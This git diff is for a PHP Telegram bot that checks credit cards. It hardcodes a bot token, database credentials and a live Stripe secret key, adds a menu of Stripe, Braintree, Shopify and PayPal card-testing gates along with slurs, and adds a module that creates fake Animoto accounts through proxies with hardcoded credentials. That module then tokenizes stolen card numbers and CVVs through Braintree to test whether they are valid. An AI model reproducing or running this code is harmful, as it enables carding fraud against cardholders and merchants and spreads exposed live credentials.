diff --git a/app.json b/app.json
index 5934f6a..cdef77b 100644
--- a/app.json
+++ b/app.json
@@ -12,47 +12,47 @@
"env": {
"BOT_TOKEN": {
"description": "Enter your Bot Token Here. Get it from @Botfather",
- "value": "",
+ "value": "5091817901:AAEWztn1fe68E-JEy2Zx5Xvs2XCgs8nKXe4",
"required": true
},
"ADMIN_ID": {
"description": "Enter the User ID of Admin.",
- "value": "",
+ "value": "2102968249",
"required": true
},
"LOGS_DUMP_ID": {
"description": "Enter the ID of a Group/Channel to store Logs",
- "value": "",
+ "value": "-1001644481681",
"required": true
},
"DB_HOST": {
"description": "Database URL",
- "value": "",
+ "value": "sql6.freesqldatabase.com",
"required": true
},
"DB_USERNAME": {
"description": "Database Username",
- "value": "",
+ "value": "sql6458113",
"required": true
},
"DB_PASSWORD": {
"description": "Database Password",
- "value": "",
+ "value": "rBh83M86Wa",
"required": true
},
"DB_NAME": {
"description": "Database Name",
- "value": "",
+ "value": "sql6458113",
"required": true
},
"ANTISPAM_TIMER": {
"description": "AntiSpam Timer Value in seconds",
- "value":"20",
+ "value":"10",
"required": true
},
"SK_KEYS": {
"description": "Enter SK Keys Here. Separate Multiple Keys with ,",
- "value": "",
+ "value": "sk_live_69GKI0saLB8uIEnxzv8VTvRX",
"required": false
},
"TIMEZONE": {
diff --git a/config/config.php b/config/config.php
index 664757e..c416bc1 100644
--- a/config/config.php
+++ b/config/config.php
@@ -9,7 +9,7 @@
| It can be obtained from https://telegram.dog/BotFather
|
*/
-$config['botToken'] = $_ENV['BOT_TOKEN'];
+$config['botToken'] = "5371601542:AAGAJjzIpCCFJ1Kx1l9RyG_O9xp0UA3S100";
/*
|--------------------------------------------------------------------------
@@ -20,7 +20,7 @@
| ID can be obtained from https://telegram.dog/username_to_id_bot
|
*/
-$config['adminID'] = $_ENV['ADMIN_ID'];
+$config['adminID'] = "1324149659";
/*
|--------------------------------------------------------------------------
@@ -31,7 +31,7 @@
| ID can be obtained from https://telegram.dog/BotFather
|
*/
-$config['logsID'] = $_ENV['LOGS_DUMP_ID'];
+$config['logsID'] = "-1659771815";
/*
|--------------------------------------------------------------------------
@@ -43,7 +43,7 @@
| By Default it's in IST
|
*/
-$config['timeZone'] = $_ENV['TIMEZONE'];
+$config['timeZone'] = "Asia/Kolkata";
/*
|--------------------------------------------------------------------------
@@ -52,10 +52,10 @@
| Database to Store User Data
|
*/
-$config['db']['hostname'] = $_ENV['DB_HOST'];
-$config['db']['username'] = $_ENV['DB_USERNAME'];
-$config['db']['password'] = $_ENV['DB_PASSWORD'];
-$config['db']['database'] = $_ENV['DB_NAME'];
+$config['db']['hostname'] = " sql6.freesqldatabase.com";
+$config['db']['username'] = "sql6458113";
+$config['db']['password'] = "sql6458113";
+$config['db']['database'] = "rBh83M86Wa";
/*
|--------------------------------------------------------------------------
@@ -66,7 +66,7 @@
| Value is in Seconds. "20" = 20seconds
|
*/
-$config['anti_spam_timer'] = $_ENV['ANTISPAM_TIMER'];
+$config['anti_spam_timer'] = "10";
/*
|--------------------------------------------------------------------------
@@ -78,5 +78,5 @@
| array('sk1','sk2','sk3')
|
*/
-$config['sk_keys'] = explode(",", $_ENV['SK_KEYS']);
+$config['sk_keys'] = array('sk_live_69GKI0saLB8uIEnxzv8VTvRX');
?>
diff --git a/main.php b/main.php
index ed42a7f..05b4151 100644
--- a/main.php
+++ b/main.php
@@ -48,10 +48,10 @@
'reply_to_message_id'=> $message_id,
'reply_markup'=>json_encode(['inline_keyboard' => [
[
- ['text' => "💠 Created By 💠", 'url' => "t.me/ninjanaveen"]
+ ['text' => "💠 Created By 💠", 'url' => "t.me/Arceus69_Xd"]
],
[
- ['text' => "💎 Source Code 💎", 'url' => "t.me/IndianBotsChat"]
+ ['text' => "💎 Source Code 💎", 'url' => "t.me/ninjanaveen"]
],
], 'resize_keyboard' => true])
@@ -95,14 +95,25 @@
'message_id'=>$callbackmessageid,
'text'=>"━━CC Checker Gates━━
-/ss | !ss - Stripe [Auth]
-/sm | !sm - Stripe [Merchant]
-/schk | !schk - User Stripe Merchant [Needs SK]
+/ss | .ss - Stripe [Auth]
+/ss2 | .ss2 - Stripe - 2[Auth]
+/chk | .chk - Stripe [Merchant]
+/sch | .sch - User Stripe Merchant [Needs SK]
+/b3 | .b3 - Braintree Merchant [Auth]
+/br | .br - Braintree Merchant Gate-2[Auth]
+/chg | .chg - Stripe 20$ Chrg [Charge]
+/ch2 | .ch2 - Stripe 8.50$ Chrg [Charge]
+/shp | .shp - Shopify 8.50$ [Charge]
+/sh2 | .sh2 - Shopify 10$ [Charge]
+/pp | .pp - Paypal [Auth]
+/sch | .sch - User Stripe Merchant [Needs SK]
+/gf | .gf - For GirlFrnd [Needs Male Gender]
+/rnd | .rnd - For Randi [Needs Dick]
/apikey sk_live_xxx - Add SK Key for /schk gate
/myapikey | !myapikey - View the added SK Key for /schk gate
-ϟ Join IndianBots",
+ϟ Join Dazai Osamu",
'parse_mode'=>'html',
'disable_web_page_preview'=>true,
'reply_markup'=>json_encode(['inline_keyboard'=>[
diff --git a/modules/apikey.php b/modules/apikey.php
index 76680da..d24ecb9 100644
--- a/modules/apikey.php
+++ b/modules/apikey.php
@@ -25,7 +25,7 @@
if($antispam != False){
bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'text'=>"[Surprise MotherFucker!! ANTI SPAM] Try again after $antispams.",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id
]);
@@ -92,7 +92,7 @@
bot('editMessageText',[
'chat_id'=>$chat_id,
'message_id'=>$messageidtoedit,
- 'text'=>"This SK Key is Dead! Provide me a Live SK Key",
+ 'text'=>"This SK Key is Dead! Live SK DE Bhosdike ",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/binlookup.php b/modules/binlookup.php
index f24735c..e8354e3 100644
--- a/modules/binlookup.php
+++ b/modules/binlookup.php
@@ -24,7 +24,7 @@
if($antispam != False){
bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'text'=>"[Surprise MotherFucker!! ANTI SPAM] Try again after $antispams.",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id
]);
@@ -33,7 +33,7 @@
}else{
$messageidtoedit1 = bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"Wait for Result...",
+ 'text'=>"Ruk Ja Bsdk...",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id
@@ -120,7 +120,7 @@
Issuers Contact: $phone
━━━━━━━━━━━━━
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: [Mabidax]",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id,
'disable_web_page_preview'=>'true']);}
@@ -140,9 +140,9 @@
bot('editMessageText',[
'chat_id'=>$chat_id,
'message_id'=>$messageidtoedit,
- 'text'=>"Never Gonna Give you Up!
+ 'text'=>"Gandu Insaan !
-Provide a Bin!",
+Bin Toh De !",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/checker/b3 2.php b/modules/checker/b3 2.php
new file mode 100644
index 0000000..f418059
--- /dev/null
+++ b/modules/checker/b3 2.php
@@ -0,0 +1,625 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mm = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $yyyy = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+//================[ User Randomization ]================//
+$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$first = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
+$street = $matches1[1][0];
+//Email
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$name = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+
+#------[Email Generator]------#
+
+function emailGenerate($length = 10)
+{
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+}
+$email = emailGenerate();
+
+//
+preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
+$city = $matches1[1][0];
+preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
+$state = $matches1[1][0];
+preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
+$phone = $matches1[1][0];
+preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
+$postcode = $matches1[1][0];
+
+#------[Winscribe]------#
+
+$proxy = [
+ 'socks-us.windscribe.com:1080',
+ 'socks-nl.windscribe.com:1080',
+];
+
+#------[GET]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/pricing');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: GET';
+$headers[] = 'path: /pricing';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'if-none-match: W/"96bcdea6b446fea0bae5dabdf6fa36fd"';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: none';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get = curl_exec($ch);
+
+#------[GET-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/account/purchase/professional');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: GET';
+$headers[] = 'path: /account/purchase/professional';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'if-modified-since: Tue, 23 Nov 2021 06:31:00 GMT';
+$headers[] = 'referer: https://animoto.com/pricing';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get2 = curl_exec($ch);
+
+//TRIMMING AUTH BEARER
+$b3en = trim(strip_tags(getStr($get2, "braintreeToken : '", "',")));
+$b3de = base64_decode($b3en);
+$finger = trim(strip_tags(getStr($b3de, '"authorizationFingerprint":"', '"')));
+
+#------[CURL-1]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/appservice/oauth/access_token');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /appservice/oauth/access_token';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/vnd.animoto-v5+json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/vnd.animoto-v5+json';
+$headers[] = 'origin: https://animoto.com';
+$headers[] = 'referer: https://animoto.com/account/purchase/professional';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-animoto-accept: application/vnd.animoto-v5+json';
+$headers[] = 'x-animoto-authorization: Bearer 30046e47e5a15a5c3a2f12754d1d9155f9e544cf9a6f5fe5a981de40b2407ba9';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"grant_type":"https://animoto.com/oauth/grant_types/new_user","user":{"email":"'.$email.'","password":"Moon12#","full_name":"Lucas Noob","user_hints":[{"name":"tos_version","data":"1.6"}],"recaptcha_token":"03AGdBq26_L1zFEtIFJ2tJbmEtovlK5q5JICvCdVq4jCK9wX4CchSV0D-GRHAozJyFUT4zV-kMA5AoMldY4Zm-2aBU71nTyjgEQhpyqaFSZNmxofBriC5ll3Hr6KzQQQmhVODy16yXXj0Kwl-9znfTjgg2iQ6XMQZN-Bqn-OFE_-l1UkG_jEcD0dk2Kdag2Br1hf7TRlr54zAhFhRedhr4UqtSit7qht9wkioncNJG_ITf5K8MnF9mxP-MufFAu-fbCITY0N-ItyUn3bma9bnoEtyQ20EEdOjJGeiedCvA6_At_3g0kpefXGTXwB39pPcGFnFM3ryvJ-7RbtrS5895GqdCJSoRSB8917BGSGoYuY_-Ky8DMY91HORs6RoLAvtiXqdCCySS_uw-cLf1lPSFHZyAJMRcF7wcXQQ0lNDsZpSHw1_1vvxYp0Qc6RhJbAvHMa5TFVpiMdI6","user_demographics":{"user_type":"consumer"},"price_list_logical_id":"57"}}');
+$curl01 = curl_exec($ch);
+curl_close($ch);
+
+
+#------[CURL-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/w/update_cart');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /w/update_cart';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: */*';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryzyL346rFLuef3Ics';
+$headers[] = 'origin: https://animoto.com';
+$headers[] = 'referer: https://animoto.com/account/purchase/professional';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="price_id"
+
+2873
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="project_id"
+
+
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="render_id"
+
+
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="country"
+
+IN
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="code"
+
+
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="postal_code"
+
+
+------WebKitFormBoundaryzyL346rFLuef3Ics
+Content-Disposition: form-data; name="region"
+
+
+------WebKitFormBoundaryzyL346rFLuef3Ics--');
+$curl02 = curl_exec($ch);
+curl_close($ch);
+
+
+
+#------[CURL-3]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/w/update_cart');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /w/update_cart';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: */*';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundary2XmpcBIUOrnsP95f';
+$headers[] = 'origin: https://animoto.com';
+$headers[] = 'referer: https://animoto.com/account/purchase/professional';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="price_id"
+
+2373
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="project_id"
+
+
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="render_id"
+
+
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="country"
+
+US
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="code"
+
+
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="postal_code"
+
+90034
+------WebKitFormBoundary2XmpcBIUOrnsP95f
+Content-Disposition: form-data; name="region"
+
+New York
+------WebKitFormBoundary2XmpcBIUOrnsP95f--');
+$curl3 = curl_exec($ch);
+curl_close($ch);
+
+
+
+//==============[ 1st req ]==============//
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://payments.braintree-api.com/graphql');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'Accept: */*';
+$headers[] = 'Accept-Language: en-US,en;q=0.9';
+$headers[] = 'Authorization: Bearer '.$finger.'';
+$headers[] = 'Braintree-Version: 2018-05-10';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Content-Type: application/json';
+$headers[] = 'Host: payments.braintree-api.com';
+$headers[] = 'Origin: https://assets.braintreegateway.com';
+$headers[] = 'Referer: https://assets.braintreegateway.com/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'Sec-Fetch-Dest: empty';
+$headers[] = 'Sec-Fetch-Mode: cors';
+$headers[] = 'Sec-Fetch-Site: cross-site';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"clientSdkMetadata":{"source":"client","integration":"custom","sessionId":"f1fbb385-24a7-41d4-9947-8457aac91c2a"},"query":"mutation TokenizeCreditCard($input: TokenizeCreditCardInput!) { tokenizeCreditCard(input: $input) { token creditCard { bin brandCode last4 binData { prepaid healthcare debit durbinRegulated commercial payroll issuingBank countryOfIssuance productId } } } }","variables":{"input":{"creditCard":{"number":"'.$cc.'","expirationMonth":"'.$mm.'","expirationYear":"'.$yyyy.'","cvv":"'.$cvv.'"},"options":{"validate":false}}},"operationName":"TokenizeCreditCard"}');
+$curl1 = curl_exec($ch);
+$token = trim(strip_tags(getStr($curl1,'"token":"','"')));
+curl_close($ch);
+//echo $curl1;
+
+//==============[ 2nd req ]==============//
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://animoto.com/a/purchases');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: animoto.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /a/purchases';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/vnd.animoto-v4+json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/vnd.animoto-v4+json';
+$headers[] = 'origin: https://animoto.com';
+$headers[] = 'referer: https://animoto.com/account/purchase/professional';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
